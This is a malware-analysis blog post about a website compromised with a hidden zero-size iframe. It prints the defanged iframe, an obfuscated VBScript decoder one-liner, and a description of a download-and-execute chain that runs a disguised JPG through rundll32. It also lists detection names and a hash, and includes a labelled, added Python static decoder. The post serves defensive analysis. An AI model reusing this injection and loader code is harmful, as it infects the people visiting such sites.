Endurer Original
Version 1st
The website homepage contains code:
/---
<IFRAME src = "hxxp: // 2007. Ads *** 3721.com/000002000000000000000000001.htm" width = "0" Height = "0"> </iframe>
---/
Hxxp: // 2007. Ads ***** 3721.com/03862366%0%%%%1.htm
Kaspersky reports it as Trojan-Downloader.VBS.Small.dv. It contains a VBScript program whose function is to decrypt the value of variable A and execute it.
The related code is:
/---
D = "execute": C = "&CHR(&H": N = ")": Do While Len(A) > 1: D = D & C & Left(A, 2) & "-2" & N: B = A: A = Mid(B, 3): Loop: Execute D
---/
Repeating the decryption process five times yields a VBScript program. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file boy.jpg, saves it as %Temp%/h1.bmp, and then calls the ShellExecute method of the Shell.Application object Q: "rundll32.exe", %Temp%/h1.bmp, "", "open", 0
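The layered decoding described above can be reproduced statically, so the script never has to be executed to see what it hides. The following Python is an added example, not code from the original post: it assumes each layer stores its hex string as `a="..."`, the function names are hypothetical, and the sample input is constructed with a harmless payload.

```python
import re

# Assumption: every layer assigns its hex string to variable a as a="...".
ASSIGN = re.compile(r'\ba\s*=\s*"([0-9A-Fa-f]+)"', re.IGNORECASE)

def decode_layer(a: str) -> str:
    """Mirror the stub statically: each hex pair xx becomes Chr(&Hxx - 2)."""
    out = []
    # The stub loops While Len(a) > 1, so a trailing odd character is ignored.
    for i in range(0, len(a) - 1, 2):
        value = int(a[i:i + 2], 16) - 2
        if value < 0:
            raise ValueError(f"pair {a[i:i + 2]!r} decodes below zero")
        out.append(chr(value))
    return "".join(out)

def encode_layer(text: str) -> str:
    """Inverse transform, used only to build the constructed sample."""
    return "".join(f"{ord(ch) + 2:02X}" for ch in text)

def peel(script: str, max_layers: int = 16):
    """Decode nested layers without executing them; return (count, text)."""
    layers = 0
    while layers < max_layers:
        match = ASSIGN.search(script)
        if match is None:
            break  # no further a="..." assignment: this is the final script
        script = decode_layer(match.group(1))
        layers += 1
    return layers, script

def build_sample(payload: str, layers: int) -> str:
    """Constructed test input: wrap a payload in the given number of layers."""
    script = payload
    for _ in range(layers):
        script = f'a="{encode_layer(script)}": rem decoder stub goes here'
    return script

# Constructed, harmless stand-in for the final decoded script.
FINAL = 'MsgBox "constructed final payload"'

if __name__ == "__main__":
    count, text = peel(build_sample(FINAL, 5))
    print(f"peeled {count} layers: {text}")
```

The `max_layers` bound keeps the loop from running indefinitely on input that always decodes to another assignment.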
File Description: D:/test/boy.jpg
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:43:41
Modification time: 12:44:34
Access time: 12:45:19
Size: 42856 bytes, 41.872 KB
MD5: 845989a7edc5527a88e0cb917525171e
The file is packed with nspack 1.3 -> North Star/Liu Xing.
Kaspersky reports it as Trojan.Win32.Agent.aac
Postscript:
Yesterday we found one that calls cmd.exe to run:
We found a website that spreads Weijin/Worm.Win32.Viking.if, using novel techniques.
http://endurer.bokee.com/6147701.html
http://blog.sina.com/u/49926d91010007ur
http://blog.i0778.com/?1314/action_viewspace_itemid_00003.html
Today we have another one, which calls rundll32.exe to run.